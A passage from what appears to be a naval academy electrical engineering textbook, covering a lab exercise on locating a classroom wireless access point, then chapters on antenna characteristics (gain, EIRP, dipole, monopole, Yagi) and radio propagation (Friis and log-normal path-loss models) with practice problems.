a) Try to find the AP with SSID Bad_Egg_xx ( again with xx indicating your class room).
b) Turn On the “Locate Sound” in Settings and change the polling time to 1 second. Right click on Bad_Egg_xx
in the Networks list and select Locate. This will create a ping. The closer the pings are together, the stronger the
AP’s signal.
c) Begin walking through the lab deck following your ping, dBm and Radar in a direction that makes the signal
stronger.
Question 7: Where is the AP located? What is the message that is written on the AP?
Question 8: Emissions controls in the military refers to controlling your Radio Frequency Emissions. Keeping “The
Hunt” from above in mind, why might it be important to maintain radio silence at certain times in Navy and Marine Corps?
This SX contributed by Captain Ryan Whitty, USMC.
519
520
Security Exercise 23 Answer Sheet
Name:
Questions 1/2/4/5:
Question 3:
______________________________________________________________________________
Question 6:
a)
b)
c)
d)
_________________________ Instructor/Lab Tech Signature
______________________________________________________________________________
Question 7:
______________________________________________________________________________
Question 8:
a)
b)
______________________________________________________________________________
521
522
Chapter 24: Antennas
Objectives:
(a) Describe the role of an antenna in a wireless communication system.
(b) Explain the difference between power gain and antenna gain, and compute an antenna's gain relative to an isotropic point
source (dBi).
(c) Describe the advantages and disadvantages of directional antennas.
(d) Describe the role of directors and reflectors in the design of a Yagi Antenna.
(e) Interpret an antenna's radiation pattern to determine the sidelobe level and front-to-back ratio in dB, the beamwidth, and
directions from which interfering or eavesdropping antennas may lay.
Connection to Cyber Security
Modulated signals are amplified to raise their power (Chapter 23), and then if free-space is the communication channel,
transmitted and received using an antenna. A necessary part of a free-space communication system, antennas serve as the
bridge from the transmitter and receiver to the communication channel. However, unlike a wire-based communication
system, free-space is an open medium, and anyone with an antenna can collect transmitted signals or transmit their own
signals. This makes free-space systems particularly vulnerable to cyber attacks involving eavesdropping and jamming.
I. Antenna Characteristics
An antenna is a device that provides a transition between guided electromagnetic waves in electrical circuits to
electromagnetic waves in free space, and can be a length of wire, a metal rod, or a piece of metal tubing. Recall that
wavelength () and frequency (f ) of an electromagnetic wave in free space are related by the speed of light (c), where c = 3.0
x 108 m/s:
c
l= .
f
The length of an antenna is usually expressed in terms of the wavelength () of the frequencies being transmitted.


Low frequencies imply long wavelengths, hence low frequency antennas are very large (for example, the towers
across the Severn River are used for the VLF Submarine Broadcast, 30 kHz and are hundreds of feet high).
High frequencies imply short wavelengths, hence high frequency antennas are usually small (for example, the Dish
Network transmission frequency from the satellite to your satellite dish is 12 GHz, and the antenna is approximately
1 cm long)
Antennas are dual function, meaning that an antenna designed to transmit a certain frequency can also receive that frequency.
When selecting an appropriate antenna for a communication system, there are four key criteria that must be evaluated:
antenna gain, antenna beam pattern/beamwidth, antenna bandwidth and physical size.
1.
Gain – Antennas are not amplifiers as you saw in Chapter 23, and the power out of the antenna is no more than the
power in. However, because antennas focus power in certain directions, we say that an antenna can have a gain.
Antenna gain determines how concentrated the transmitted power is in a particular direction (usually the direction of
maximal radiation), or how well the antenna can receive signals from a particular direction. Higher gain means a
stronger signal, making communication over longer distances possible. Conversely, we could communicate over the
same distance with less transmit power. Note that some antennas use a parabolic dish to further increase antenna
gain (such as the satellite dish for home satellite TV—the actual antenna is still 1 cm long, but the dish is much
bigger).
Isotropic antennas are theoretical antennas that have no directionality, and radiate their power equally in all
directions. Consider the figure below. On the left is an isotropic antenna, located at the center of the sphere. The
power it transmits is spread equally in all directions, in a spherical shape. If it transmits 1 W, that 1 W will be spread
over the surface of the sphere, so as you move farther from the antenna, the received power per unit area drops
dramatically. On the right is a directional antenna. If this antenna also transmits 1 W, that power is spread over a
much smaller surface area, as indicated, so that in the direction the antenna is pointing, the reduction in power is
523
much less as you move farther from the antenna. The antenna gain is a measure of power transmitted by a
directional antenna in the direction it is pointing relative to that transmitted by an isotropic source.
The mathematical definition of antenna gain is
G=
Radiated power density at distance x from directional antenna .
Radiated power density at distance x from isotropic antenna
If we convert this to decibels, because we are comparing relative to an isotropic antenna, it is common to use dBi
instead of dB. To compute antenna gain in decibels, we have
GdBi = 10 log10 (G ) (dBi).
Similarly, to convert from dBi to ratio we use
GdBi
G = 10 10 (unitless).
Light can be used as an analogy to antenna gain. Imagine a single light bulb five feet from a wall. The light bulb
sends light equally in all directions similar to how an isotropic antenna sends radio waves equally in all directions.
When we put the lightbulb in a flashlight, the design of the flashlight focuses light in a single direction and the
portion of the wall still illuminated by light will consequently be brighter. This is similar to how a directional
antenna focuses radio waves in a particular direction and is able to affect communications over longer distances
(e.g., satellite communications). Antenna gain can be thought of as how much brighter the wall is with the flashlight
versus how bright it was with only the light bulb.
A related characteristic of transmitting stations in a wireless communication system is the Effective Isotropic
Radiated Power (EIRP), which is the product of the transmit power and the antenna gain:
EIRP = Pt Gt (Watts)
Here, the subscript t indicates that this is transmitter power and transmit antenna gain. In decibels,
.
EIRP is the amount of power that an isotropic antenna would have to transmit to achieve the same received power as
a directional antenna at the same distance.
To better explain this, let’s return briefly to our flashlight analogy. Let’s say I have 1W being sent into my flashlight
which is five feet from the wall. The wall will then be a certain brightness. If we then remove the lightbulb from the
flashlight and stay five feet away, the wall will get dimmer as we’ve previously discussed. EIRP is how much power
I would now need to send into the lightbulb, without the flashlight, in order to make the wall as bright as it was with
the flashlight.
An antenna with directional gain has some advantages over an isotropic antenna. These include:
 Because energy is only sent in the desired direction, the possibility of interference with other transmitters at
or near the same frequency is reduced.
 More focused power results in increased gain, which means that less power is required.
524
 Controlling the direction of the beam can help prevent eavesdropping since you must be in the beam in order
to receive the signal.
 A narrow beam can reduce the likelihood of detection in a covert setting for the same reason as was just
discussed.
However, directional antennas don’t work well in mobile situations (imagine keeping your cell phone pointed at a
cell tower as you’re driving past it) and they can be physically large if gain is big.
Practice Problem 24.1
A radio station has an EIRP of 25 kW and a transmit power of 1.73 kW. What is the gain of the antenna?
2.
Beam Pattern/Beamwidth – Beam pattern is a diagram that shows specifically what direction(s) the antenna favors.
You can think of a radiation pattern being created by having an antenna radiate a constant power (say 1 W, although
any power will do), and then with a power meter, walk in a complete circle 1 km (or any other constant distance)
from the antenna and record the power received at each point along the circle. The result will look something like
the following figure.
An example radiation pattern is shown in this figure in red. In this pattern, relative bearings are shown with 0° being
the direction the antenna is pointing. In this figure, each circle represents a change in received power of 3 dB, and
the maximum power is along the 0° bearing. There are six lobes of transmitted power showing. The mainlobe is
oriented towards 0°, the direction the antenna is pointing. There are four sidelobes, oriented towards ±60° and
±120°, and a backlobe, oriented towards 180° (directly away from where the antenna is pointing).
In many cases, the mainlobe’s maximum value will be defined as 0 dB, and the power levels at all other points on
the pattern are the number of dB less than the max; this is a measure of power relative to the max power.
This form of a radiation pattern is only one of many that could be used; sometimes the rings are not in dB,
sometimes they represent power density (W/m2), or power (dBW or dBm), etc. But the general features of the beam
pattern will be similar. In actuality, antennas radiate in 3-dimensions but the radiation patterns we will focus on are
2-dimensional, like the one shown above.
525
From the radiation pattern, a few new terms that describe the properties of the antenna come about. The sidelobe
level (SLL) is a measure of the strength of the sidelobes compared to the mainlobe in decibels. The sidelobe level is
measured from the peak of the main lobe to the peak of the largest sidelobe. Mathematically,
SLLdB = Gmainlobe(dB) - Gsidelobe(dB) .
For the antenna with radiation pattern on the previous page, the largest sidelobes are at ±60°, so SLLdB = 0 dB – (–
16 dB) = 16 dB. Similarly, the front-to-back ratio (FBR) is a measure of the strength of the mainlobe to the strength
of the back lobe in decibels. Mathematically,
FBRdB = Gmainlobe(dB) - Gbacklobe(dB)
.
For the antenna with radiation pattern on the previous page, the backlobe is at –17 dB, so the front-to-back ratio is
FBRdB = 0 dB – (– 17 dB) = 17 dB.
Finally, note that the radiation pattern has some bearings that are not a part of any lobe, for example ±35°. These are
called nulls of the pattern, and at these bearings, no power is transmitted from this antenna (or perhaps a miniscule
amount), nor can this antenna cannot receive signals from these bearings.
3.
Beamwidth – Beamwidth is based on the relative bearings where transmitted (or received) power is reduced by a
factor of ½ (or -3 dB, since 10 log10 (½) = -3) from the direction of max power. We call these points on the diagram
the -3 dB (or half-power) points. The beamwidth is the angle that subtends these points. The following figure shows
the beamwidth computation for the above beam pattern; the beamwidth is 20°. A narrow beamwidth (small angle)
means the antenna is very directional.
4.
Bandwidth – Bandwidth determines the range of frequencies that the antenna is best suited for. Broadband signals
(that is, signals with a very wide bandwidth) transmit more data at a faster data rate, but broadband antennas are
harder to design/build. An antenna is normally designed for a certain transmit frequency, but can be used
successfully for a range of frequencies around that.
5.
Physical Size – Physically larger antennas have a higher gain and narrower beamwidth, but are much harder to
conceal. Also, the system using the antenna may introduce its own constraints (e.g., no one wants to mount a 6 meter
dish on the roof of their car). Antennas radiate most effectively when their length is directly related to the
wavelength of the transmitted signal. Most antennas have a length that is some fraction of a wavelength. One-half
and one-quarter wavelengths are most common.
526
Practice Problem 24.2
Consider the antenna with this radiation pattern:
1. What is the beamwidth of this directional antenna?
2. What is the sidelobe level?
3. What is the front-to-back ratio?
4. Will a station transmitting bearing 90° interfere with me?
Will I interfere with it?
5. Will a station bearing 240° be able to eavesdrop on my communications?
6. Suppose the receiver I am communicating with (at 0°) requires that the signal received be at least 1 pW. Will I have to
transmit more power or less power using this antenna than if I were using an isotropic antenna? Why?
II. Dipole Antenna
One of the most widely used antenna types is the half-wave dipole. A dipole antenna is two pieces of wire, rod, or tubing that
are one-quarter wavelength long at the operating frequency connected to a voltage source (these are the poles). The antenna is
formed by placing these poles at a 90° angle from the transmission lines that are carrying the signal to be transmitted. This is
depicted in the figure below. The most efficient radiation of EM waves comes when the total length of the antenna is λ/2
long, which is why the antenna is called the half-wave (λ/2) dipole antenna.
527
The radiation pattern for a horizontally oriented dipole antenna is shown below (on the left). The dipole is the heavy black
line segment. The scale is not in dB, but this is the general shape. It is bidirectional, in that there is a backlobe that is as large
as the mainlobe, both emanating perpendicular to the orientation of the dipole. If the dipole is oriented vertically, the
radiation pattern is omnidirectional, as shown on the right.
The 3-dimensional radiation patterns for the horizontally and vertically mounted dipole are shown on the next figure. Note
that the 2-dimensional patterns above are cutaways of the 3-dimensional patterns.
Major Parameters for the Dipole Antenna:
1. Beam Pattern/Beamwidth – A dipole mounted vertically has the 2-dimensional beam pattern in the azimuth plane
shown in the figure on the previous page, and a -3 dB beamwidth of 78º. The vertically mounted antenna has an
omnidirectional pattern in the azimuth (energy is spread equally in all directions).
2. Gain – A dipole has a gain of G = 1.64, or GdBi = 2.15 dBi.
3. Bandwidth – A dipole typically has a bandwidth that is ~25% of the center frequency of transmission.
4. Physical Size – A dipole has a physical size equal to λ/2, where λ is the wavelength of transmission.
Practice Problem 24.3
A transmitter feeds a half-wave dipole antenna with 100 watts of power. Calculate the Effective Isotropic Radiated Power
(EIRP).
528
Practice Problem 24.4
How long would a dipole antenna be for AM 1100?
III. Monopole Antenna
The quarter-wave (λ/4) monopole antenna, also called a Marconi antenna, is
widely used. It’s characteristics are similar in to a vertically mounted dipole
antenna, except that the monopole is connected to a ground plane (such as
the earth), and uses it as a as a type of electrical “mirror” to reflect
transmitted or received energy upwards to contribute to the upper part of the
radiation pattern. Effectively, the ground plane acts as the “missing” half of
a dipole antenna. The 3-dimensional radiation pattern for the vertically
mounted λ/4 monopole is shown in the following figure (on the left), and a
slice of the pattern (2-dimensional pattern in the vertical direction) is shown
on the right.
Major Parameters for the Monopole Antenna
1. Beam Pattern/Beamwidth – A monopole has an omnidirectional pattern in the azimuth (energy is spread equally in all
directions), and a -3 dB beamwidth of 45º in the vertical plane.
2. Gain – A monopole has a gain of G = 1.45, or GdBi = 1.6 dBi.
3. Bandwidth – A monopole typically has a bandwidth that is ~10% of the center frequency.
4. Physical Size – A monopole has a physical size equal to λ/4.
Practice Problem 24.5
The ballistic submarine, USS Alaska, has gone alert. They must stream a floating wire monopole antenna to get their alert
signal. If the alert signal is transmitted at 30 kHz, how far should they stream their antenna? (note: the antenna being
streamed is a straight wire)
529
IV. Yagi (Yagi-Uda) Antenna
The Yagi-Uda was developed in Japan in 1926 by Professor Hidetsugu Yagi and his student Shintaro Uda. Their basic
concept and structure is still used across a wide variety of modern antenna designs, and the Yagi-Uda is still the “go-to”
antenna for high gain at VHF and UHF frequencies. There was a time when every home in America was equipped with a
Yagi antenna, on their roof to allow reception of broadcast television.
A Yagi antenna is composed of a driven-element (a dipole antenna) and multiple parasitic elements. A driven-element is one
that is connected electrically to the transmitter. Parasitic elements are not connected electrically, but are placed in the vicinity
of the driven element to either side. These parasitic elements (known as reflectors and directors) will resonate with the
electric field produced by the dipole. Reflectors are longer than the dipole antenna, are all placed on one side of the dipole,
and reflect the transmitted EM waves back towards the dipole antenna. Directors are shorter in length than the dipole, and
“direct” EM waves from the dipole and reflectors to form the mainlobe. Judicious spacing of the parasitic elements will allow
us to produce constructive interference and “push” energy in the forward direction, giving the Yagi-Uda good gain. The
effect of directors and reflectors is:

More parasitic elements means higher gain and narrower beamwidth.

Adding more directors is more effective than adding more reflectors.

The greater the number of directors, the higher the gain and the narrower the beamwidth.

However, we get diminishing returns as more elements are added. Most Yagi antennas have 1 reflector and 1-20
directors.
Here is a Yagi-Uda with one director and one reflector. This is a three-element Yagi.
The simplest Yagi, consisting of a driven element and one reflector, shown on the bottom of the prior page, has a gain of
about 5 dBi.
Practice Problem 24.6
What is the length of the driven element in a Yagi at 290 MHz?
530
A manufacturer of Yagi antennas is the L-Com Global Connectivity corporation (www.l-com.com). Here’s an example
pattern of one of their 900 MHz Yagi antennas (model HG906YE-RSP). The driven element (dipole) has a cable connected
to it. This Yagi has 1 reflector and 2 directors, and a gain of 6 dBi. The horizontal beamwidth is 100°, vertical beamwidth
60°.
Compare that to their model HG914YE-RSP antenna, which has 1 reflector, 11 directors, and 14 dBi of gain. The horizontal
beamwidth is 31°, vertical beamwidth 28°.
All else being equal, which is the antenna with the higher gain a “better” antenna? Well, unfortunately all else is not equal.
The 6 dBi Yagi is only 14.2 inches long while the 14 dBi Yagi is a whopping 60 inches (that’s 5 full feet) long, almost six
times the length of the 6 dBi antenna. If constrained by size, the 6 dBi antenna may be the better choice.
Although the Yagi antenna does a good job at directing (and receiving) energy from the forward direction (in the main lobe),
its sidelobes are fairly large in comparison.
Major Parameters for the Yagi Antenna
1. Beam Pattern/Beamwidth – A Yagi is a directional antenna that transmits energy in a main lobe, but with fairly high
side lobe levels. The beamwidth is dependent on the number of parasitic elements, with more elements resulting in a
narrower beamwidth.
2. Gain – A Yagi’s gain is directly proportional to the number of parasitic elements, with typical gains in the range of 520 dBi (You will never be asked to calculate the gain of a Yagi antenna based on its dimensions).
3. Bandwidth – A Yagi is typically very narrowband, with a bandwidth ~5% of the center frequency.
4. Physical Size – A Yagi’s dipole radiator has a physical size equal to λ/2, but the length is determined by the number of
directors. Directors are typically spaced in half-wavelength increments.
You should be familiar with the four major parameters for the following three antennas:
Dipole
Monopole
Yagi-Uda
531
532
Problems
1.
What are the 4 engineering factors associated with the design of antennas?
2.
a) Calculate the length, in meters, of a dipole antenna that is designed to receive a station at AM 800 on the dial of an
AM radio.
b) Calculate the length, in meters, of a monopole antenna that is designed to receive the FM station at 107.1MHz.
3.
Given the following radiation pattern, where each ring represents a 1 dB change in power, what is the beamwidth? The
sidelobe level? The front-to-back ratio?
4.
Given the following radiation pattern, where each ring represents a 2 dB change in power, what is the beamwidth? The
sidelobe level? The front-to-back ratio?
5.
The power applied to an antenna with a gain of 4 dB is 13 W. What is the EIRP?
6.
What does it mean for an antenna to have directivity, and what are the advantages and disadvantages of a directional
antenna?
7.
Name and describe the three basic elements in a Yagi antenna.
533
8.
The length of the driven element in a Yagi antenna is 900 mm; what is its operating frequency?
9.
The mainlobe of an antenna has a maximum gain value of +18 dB at its peak point of forward direction. The same
antenna has a gain of −5dB at the peak point of its rear lobe. Determine the front-to-back ratio of the antenna.
10. Yagi antennas A and B both have a driven element designed to transmit/receive 100 MHz. Yagi antenna A has 1 director
and 3 reflectors, while Yagi antenna B has 1 director and 7 reflectors. Describe the differences you would expect to see
in their radiation patterns.
534
Security Exercise 24
Reserved.
535
536
Chapter 25: Propagation
Objectives:
(a) Define reflection, refraction, diffraction and scattering.
(b) Describe the characteristics of ground waves, sky waves, and space waves.
(c) Calculate the radio horizon distance for space waves based on antenna height.
(d) Compute received power level for a communication system using Friis Free Space equation.
(e) Using the log-normal propagation model, compute received power, path loss or transmission distance.
Connection to Cyber Security
In a wireless communication system, the transmitter transmits a modulated signal into free-space using an antenna. The
signal then propagates through free-space until it reaches the receive antenna. Along the way, the transmitted signal loses
power, so that by the time it gets to the receiver, the received power can be extremely low. If the received power is too low,
the receiver will not be able to recover the information. In this chapter, you’ll be introduced to the various ways that signals
can propogate through free-space, and also how to compute the received power. Cyber attacks against wireless
communication systems can take advantage of a low received signal power to jam the transmission, or to take control of the
communication link.
I. Wireless Propagation
Propagation is the means by which a signal moves from Point A to Point B. It sounds simple, but it is the most fundamental
and challenging aspect of wireless communications. In a wired system (such as an Ethernet network), propagation is not
really a concern per se. However, wireless transmission requires a fundamental understanding of how electromagnetic waves
move through the atmosphere. The challenges of propagation in free-space include the fact that the transmitter and/or
receiver may be moving, obstacles in the path of propagation, a path that is not necessarily a straight line, and a signal that
takes various paths to get to the receiver.
In general, we can think about radio frequency propagation in two broad categories: large scale and small scale. Our
emphasis in EC310 is on understanding large scale propagation (longer distance), although many engineers have devoted
their entire careers to understanding and modeling small scale propagation. In fact, you’ve likely experienced a small scale
propagation issue numerous times without ever realizing it. The classic example would be driving down the highway while
talking on your cell phone and experiencing a dropped call.
Large Scale Propagation – The behavior of the radio channel over large distances (100s or 1000s of wavelength of
distance). Received power is directly related to distance between Tx and Rx, and is stationary with respect
to time.
Small Scale Propagation – The behavior of the radio channel over a small local area (1-10 wavelengths of
distance) and/or of small time durations. Received power fluctuates rapidly based on position, speed,
direction of travel, etc. of the mobile.
II. Large Scale Propagation
A. Physical Phenomena
Large scale propagation is affected by four physical phenomena:




Reflection – the bouncing of EM waves off of surrounding objects, such as vehicles, buildings, etc.
Refraction – the bending of EM waves as they travel through mediums of different material
Diffraction – bending of EM waves around objects
Scattering – diffuse re-radiation of EM waves off rough (smaller than the signal’s λ) objects
Let’s look at these briefly one at a time.
537
1. Reflection Reflection occurs when a transmitted EM wave strikes a conductive object (such as a metallic object) on
its path to the receiver. As you recall from physics, in reflection, if the object is flat, the angle of reflection is equal to the
angle of incidence.
2. Refraction When an EM wave passes from one medium to another, the EM wave’s path can change direction (bend).
In wireless communications, we see this when EM waves directed towards the sky go up into the ionosphere, and
eventually bend back down to earth as depicted in the figure below.
3. Diffraction Diffraction is the bending of EM waves around objects in their path, even behind them to some extent.
Consider a transmitter and receiver where an object is blocking the direct line-of-sight path between them. The signal
can diffract around the object such that the signal can get to the receiver even though it is shadowed. Note that the more
deeply the receiver is shadowed, the lower the received power, and in some cases, the receiver may not be able to receive
any signal. The concept of diffraction is illustrated below.
1.
4. Rough Surface Scattering Sometimes called diffuse scattering or diffuse reflection, scattering happens when an EM
wave impacts a rough surface and is re-radiated in many directions at much reduced power levels .
So those are the basic physical phenomena propagation. What happens when we add in a real earth and a real atmosphere?
The earth and the earth’s atmosphere have the greatest impact on signals in the VLF – HF range (3 kHz – 30 MHz). It’s not
that the earth and atmosphere don’t affect signals at higher frequencies, it’s just at those higher frequencies other factors
come into play and dominate the effects of the earth/atmosphere. Let’s look at what happens to these lower frequencies first
before moving on to the higher frequencies.
538
Frequency Range
Frequency Range
Propagation Mode
VLF
(Very Low Frequency)
3 kHz – 30 kHz
- Ground waves
LF
(Low Frequency)
30 kHz – 300 kHz
- Ground waves
MF
(Medium Frequency)
300 kHz –3 MHz
- Ground waves, sky waves at night
HF
(High Frequency)
3 MHz – 30 MHz
- Sky waves
VHF
(Very High Frequency)
30 MHz –300 MHz
- Space waves
UHF
(Ultra High Frequency)
300 MHz – 3 GHz
- Space waves
SHF
(Super High Frequency)
3 GHz – 30 GHz
- Space waves
EHF
(Extremely High Frequency)
30 GHz – 300 GHz
- Space waves
B. Modes of Propagation
For VLF-HF communications, there are three basic modes a radio wave can travel from the transmitter to a receiving
antenna:
 Ground wave – EM waves that travel close to the surface of the earth
 Sky wave – EM waves that travel up into the atmosphere and then bend back to earth
 Space wave – EM waves that travel in a straight line (direct line-of-sight or LOS)
The frequency of the radio wave is the most important factor in determining the mode and performance of each mode of
propagation.
1. Ground Wave Propagation A ground wave is a radio wave that travels along the earth’s surface (also referred to as
a surface wave). A ground wave must be vertically polarized; that is, the antenna must be oriented vertically.
Lower frequencies travel efficiently as ground waves because they are diffracted by the surface of the earth. Ground
waves thus follow the curvature of the earth and can travel beyond the horizon, for hundreds of miles. Ground wave
propagation is strongest in the LF and MF frequency ranges. Ground wave propagation constitutes the main signal path
for signals in the frequency range from 30 kHz – 3 MHz.
2. Sky Wave Propagation Sky waves are radiated by an antenna into the upper atmosphere where they are reflected or
refracted back to earth. The air molecules of the ionosphere are subject to severe radiation from the sun. Ultraviolet
radiation causes the molecules to ionize, or separate into charged particles, positive and negative ions. This separates the
upper atmosphere into different layers (or mediums) that promote reflection or refraction.
The direction of reflection depends on the angle at which the radio wave enters the atmosphere and the different degrees
of ionization of the layers, as well as the frequency of the transmission.
539
3. Space Wave Propagation A space wave refers to the radio wave that travels directly in a straight line from the
transmitting antenna (LOS). These waves are not refracted, and do not follow the curvature of the earth. The chief
limitation of a space wave is that it is limited to line-of-sight distances. The range of space wave propagation is limited
by the curvature of the earth and height of the antennas above the earth’s surface.
If an antenna has a height h above the surface of the earth, the distance, d, to the radio horizon (which is the maximum
range for space wave communications from that antenna) is given by the formula
d = 2h.
Important: In this formula, the height of the antenna is in feet, and the distance to the horizon is in miles. That is, if you
plug in the antenna height in feet, the resulting distance value will be in miles.
The next figure demonstrates the maximum distance that two stations can be apart and still conduct line-of-sight
communication. This figure shows one antenna of height h1 and a second antenna of height h2. The maximum separation
at which they can still communicate by line-of-sight is given by:
dtotal = 2h1 + 2h2 .
Practice Problem 25.1
What is the longest line-of-sight communication range between a transmitter whose transmitting antenna is 350 feet high and
a receiver whose receiving antenna is 25 feet high?
Now that we’ve covered all the glories of Large Scale Propagation in real-world environments, it behooves us to look at the
most basic way we can transmit energy from Point A to Point B in an environment devoid of terrain, mountains, buildings,
540
ground, or atmosphere. Such an environment is known as Free Space, and conveniently, wireless propagation in such an
environment is known as Free Space Propagation.
III. Free Space Propagation
Let’s consider the following scenario. You have a brand-new iPhone (or Samsung phone as the case may be), have just
signed up for a super-fast LTE plan, and would like to upload a photo, surf the web, browse Facebook, or just plain make a
phone call. To make that happen, your phone has to transmit that information over the air to the nearest LTE cell tower (cost:
$5 Million, that’s why your phone bill is $100/month), which happens to be 5 miles away.
Question: Will your signal make it to the tower and will it have sufficient power to “close the link” and allow you
communicate? Or will you suffer the fate of a cellular “dead zone”? That depends on the amount of signal power that is
received.
Recall from Chapter 24 the discussion of antenna gain. An antenna has gain if it can focus its transmitted power (or can
receive power) in a certain direction, as opposed to an isotropic antenna that radiates (or receives) power equally in all
directions (in a spherical shape). This led to the term effective isotropic radiated power (EIRP), which is the amount of power
an isotropic antenna would have to radiate in order to match the power that a directional antenna radiates in the direction it is
pointing. To figure out how to compute received power, let’s consider how an isotropic antenna radiates in a spherical shape.
As EM waves move away from the isotropic antenna, the sphere gets larger and larger, until it touches our receive antenna.
The transmitter transmits a constant power, however, the power density is going to decrease as the distance from the transmit
antenna increases. Power density is the amount of power received per unit area (W/m2). The power density that reaches the
receive antenna is going to be based on the surface area of a sphere, where the distance between the transmitter and receiver
(d) is the radius of the sphere. Since the surface area of a sphere of radius d is given by
Asphere = 4p d 2
the power density (Pd) at the receiver in units of W/m2 is:
Pd =
Pisotropic
antenna
Ae
=
EIRP Pt Gt
=
.
4p d 2 4p d 2
Now, the last thing we need to do is to turn that power density into the actual received power. Power density is power per unit
area, so what is the “area” we are interested in? Since we are receiving the signal on an antenna, the “area” of interest is the
area of the receive antenna. The derivation of the effective area of an antenna is beyond the scope of the course, but it is
mathematically defined as:
Ae =
Gr l 2
.
4p
Finally, we can put all this together and determine the equation for received power, which is received power density (W/m2)
multiplied by effective area (m2):
Pr = Pd × Ae =
Pt Gt Gr l 2 Pt Gt Gr l 2
×
=
4 p d 2 4p
( 4p d )2
where the variables are defined as:
Pr
Pt
Gt
Gr
λ
d
Received power (W or mW)
Transmitted power (W or mW)
Transmit antenna gain (unitless)
Receive antenna gain (unitless)
Transmission wavelength (m)
Distance between transmitter and receiver (m)
541
This is known as the Friis Free Space Equation. It is fundamental to understanding how received power is reduced as a
function of distance for wireless communications.
Important note: in this equation, there are NO decibel terms! The two most common mistakes made when using this equation
is using dB values instead of linear values, and failing to get the wavelength/distance units correct. If you’re given a problem
that includes dB values for any of the terms, take the values out of decibels!
Let’s go back to our cell phone example.
Practice Problem 25.2
Your cell phone transmits at a power level of 500 mW, with an antenna gain of 2.0 dB. The cell tower has an antenna gain of
8.0 dB, and is a distance of 5 miles away. For LTE, you’re transmitting at 700 MHz. Will your signal make it to the tower
and will it have sufficient power to “close the link” and allow you communicate? Or will you suffer the fate of a cellular
“dead zone”? (note: 1 mile = 1.609 km, and consider −105 dBm as the minimum power required to be able to “close the
link”)
Note: The Friis Free Space equation is technically only valid for free-space environments (although many situations will
mimic free space). So the question is: what happens when we add back in the mountains, the buildings, the earth, and the
atmosphere?
542
IV. Log-Normal Model
Most terrestrial wireless communications operate in the
VHF and UHF bands. Those bands are mostly used for
narrowband, long-distance communication. In this
frequency range, the earth and atmosphere play a far smaller
role, and propagation becomes dominated by the specific
local environment. Let’s consider the following scenario.
Suppose we convince the ECE Department to build a cell
tower on the top of Rickover Hall, and you’re driving down
McNair Road. The signal you receive will be a combination
of reflection, diffraction, and scattering, as shown in the
image below. The problem is that we call it “mobile” radio
for a reason: you want to be able to drive, move about the
local environment, and communicate on your cell phone at
the same time.
Diffr
a
Sc
r
tte
g
in
R
e
e fl
actio
n
on
c ti
As you move about the environment, the three propagation
modes will have an impact on the instantaneous received
signal in different ways. Under these conditions, you
receive a nice strong signal reflected from Mahan Hall, with
a little bit of signal energy coming from diffraction off the
back corner of Nimitz Library, along with some energy
scattered by the clock tower. As you move towards Alumni
Hall, the direct line-of-sight signal to the tower will be blocked, as will most of the strong reflected signals; diffraction is now
the dominant mode. Conversely, if you moved towards Rickover Hall, you would receive a nice strong line-of-sight signal
from the tower, along with a strong reflection from the Northeast side of Nimitz Library as well as scattering from all the
parked cars in the Triangle Lot (between Rickover Hall and Nimitz Library).
So the question remains: Using your brand-new iPhone (or Samsung phone as the case may be), will your signal make it to
the tower and will it have sufficient power to “close the link” and allow you communicate? Or will you suffer the fate of a
cellular “dead zone”?
What happens when you put all three major modes of propagation together? How do you create a simple easy-toutilize model to compute the resulting received signal power?
Clearly, the Friis Free Space equation is out, since it is based on unobstructed, direct line-of-sight transmission. In addition,
ground wave/sky wave effects are so small that they can be neglected. Although numerous sophisticated models exist (and
are used to varying degrees in both commercial and military systems), by far the simplest and most common way to describe
propagation in such an environment is the Log-Normal model (also called Log-Distance model). This model is widely used to
not only predict coverage for a particular mobile user, but also for predicting the interfering signal power that the mobile user
will experience from other RF sources.
A description of the log-normal model begins with the definition of path loss. Path loss is the amount by which the
transmitted signal has dropped by the time it gets to a receiver at distance d away. Usually computed in decibels, path loss as
a function of distance d is defined as:
PLdB (d) = Pt (dB) - Pr(dB) (d)
Over the years, wireless engineers have observed that average path loss for a particular environment is related to the distance
d and follows a dn relationship, where the variable n is known as the Path Loss Exponent, and n is specific to that
environment. Researchers have also observed that when they made numerous measurements at a specific distance (but in
different local environments), the variation in received signal power obeyed a “bell curve” distribution about the local mean
(the “bell curve is formally known as a “Normal” or “Gaussian” distribution). Plotted on a log scale, the results look
something like this:
543
PL
(dB)
Average
Path Loss
Gaussian distribution of
Path Loss about that
particular distance
Distance Dependent Mean
1m
10m
100m
1km
10 km
Dist
(m)
We call this Log-Normal Path Loss. Average Path Loss obeys a linear relationship (straight line) on a log scale, and the
variation in received power at that distance follows a normal distribution. The slope of the line is the Path Loss Exponent,
and is determined experimentally for the particular scenario of interest.
Mathematically the Log-Normal Path Loss at a distance d is given by:
ædö
PLdB (d) = PLdB (d0 ) +10 × n × log10 ç ÷
è d0 ø
In this equation, the variables are:
d
d0
n
PLdB(d)
PLdB(d0)
Distance from transmitter to receiver in meters
A reference distance, usually 1 meter
Path loss exponent (unitless)
Path loss at distance d (in dB)
Path loss at reference distance d0 (in dB)
The value of PLdB(d0) is usually calculated with the Friis Free-Space equation or measured empirically. Note that antenna
gains, wavelength, etc. are embedded in the model (in PLdB(d0) and n) parameters. Changing the configuration means we will
end up with different model parameters and different results.
Values for path loss exponents have been tabulated for a number of environments, and a few representative values are given in
the following table.
Path Loss Exponents for Different Environments
Environment
Path Loss Exponent, n
Urban Area
Dense Urban Area
In Building with Line-of-Sight
In Building Obstructed
Factory Floor Obstructed
Retail Stores
2.7 to 3.5
3 to 5
1.6 to 1.8
4 to 6
2 to 3
1.8 to 2.5
So after all that discussion, we still haven’t answered the question: Using your brand-new iPhone (or Samsung phone as the
case may be), will your signal make it to the tower and will it have sufficient power to “close the link” and allow you
communicate? Or will you suffer the fate of a cellular “dead zone”?
Practice Problem 25.3
Your cell phone transmits at a frequency of 700 MHz and a power level of 500 mW, and has an antenna gain of 2.0 dB. The
ECE Department’s cell tower has an antenna gain of 8.0 dB.
Let’s assume you’re at the entrance to Gate 8, which would put you approximately 1.0 km away from the tower. From the
table above, the USNA campus most closely matches “Urban Area”, so let’s use a Path Loss Exponent that’s exactly in the
middle of the range 2.7-3.5, so use n = 3.1.
544

We will need to calculate the path loss at a reference distance (PLdB(d0)). The choice of reference distance is
technically arbitrary, but is typically 1 meter, as it makes the math much easier to work with. First, convert antenna
gains out of decibels and compute wavelength:
Gt = 10 10 = 1.585, Gr = 10 10 = 6.310, l =
2

8
m
c
3´10 8 sec
=
= 0.428 m
f 700 ´10 6 Hz
